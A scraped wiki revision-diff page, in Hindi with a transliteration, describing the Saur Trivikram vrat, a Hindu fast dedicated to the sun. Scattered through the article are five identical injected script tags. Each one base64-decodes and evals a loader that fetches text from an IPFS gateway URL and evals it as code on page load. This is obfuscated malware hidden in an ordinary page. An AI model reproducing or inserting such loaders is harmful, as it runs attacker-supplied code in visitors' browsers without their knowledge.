Difference between revisions of "सौरत्रिविक्रम व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*सौरत्रिविक्रम व्रत मासव्रत है।
 
*सौरत्रिविक्रम व्रत मासव्रत है।
 
*सौरत्रिविक्रम व्रत के [[देवता]] [[सूर्य देव|सूर्य]] हैं।
 
*सौरत्रिविक्रम व्रत के [[देवता]] [[सूर्य देव|सूर्य]] हैं।
Line 6: Line 6:
 
*सौरत्रिविक्रम व्रत एकभक्त होकर तथा एक [[ब्राह्मण]] को रात्रिकाल का भोजन दान देना चाहिए।
 
*सौरत्रिविक्रम व्रत एकभक्त होकर तथा एक [[ब्राह्मण]] को रात्रिकाल का भोजन दान देना चाहिए।
 
*यही विधि [[मार्गशीर्ष]] एवं [[पौष]] में सूर्य की पूजा [[विभाकर]] एवं [[दिवाकर]] के रूप में की जाती है।
 
*यही विधि [[मार्गशीर्ष]] एवं [[पौष]] में सूर्य की पूजा [[विभाकर]] एवं [[दिवाकर]] के रूप में की जाती है।
*[[युवावस्था]] तथा [[मध्यावस्था]] में किये गये पाप तथा यहाँ तक की महापाप भी कट जाते हैं।
+
*युवावस्था तथा मध्यावस्था में किये गये पाप तथा यहाँ तक की महापाप भी कट जाते हैं।
*इसे '[[त्रिविक्रम]]' इसलिए कहा जाता है कि सूर्य के तीन नाम व्यक्ति को तीन मासों या तीन वर्षों में मुक्ति देते हैं।<ref>हेमाद्रि (व्रत खण्ड 2, 853, भविष्योत्तरपुराण से उद्धरण)</ref>
+
*इसे '[[त्रिविक्रम]]' इसलिए कहा जाता है कि सूर्य के तीन नाम व्यक्ति को तीन मासों या तीन वर्षों में मुक्ति देते हैं।<ref>हेमाद्रि (व्रत खण्ड 2, 853, भविष्योत्तरपुराण से उद्धरण</ref>
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1
Line 15: Line 16:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:58, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • sauratrivikram vrat masavrat hai.
  • sauratrivikram vrat ke devata soory haian.
  • sauratrivikram vrat tin masoan ya tin varshoan tak kiya jata hai.
  • kartik mean jagannath ya soory ki pooja ki jati hai.
  • sauratrivikram vrat ekabhakt hokar tatha ek brahman ko ratrikal ka bhojan dan dena chahie.
  • yahi vidhi margashirsh evan paush mean soory ki pooja vibhakar evan divakar ke roop mean ki jati hai.
  • yuvavastha tatha madhyavastha mean kiye gaye pap tatha yahaan tak ki mahapap bhi kat jate haian.
  • ise 'trivikram' isalie kaha jata hai ki soory ke tin nam vyakti ko tin masoan ya tin varshoan mean mukti dete haian.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat khand 2, 853, bhavishyottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>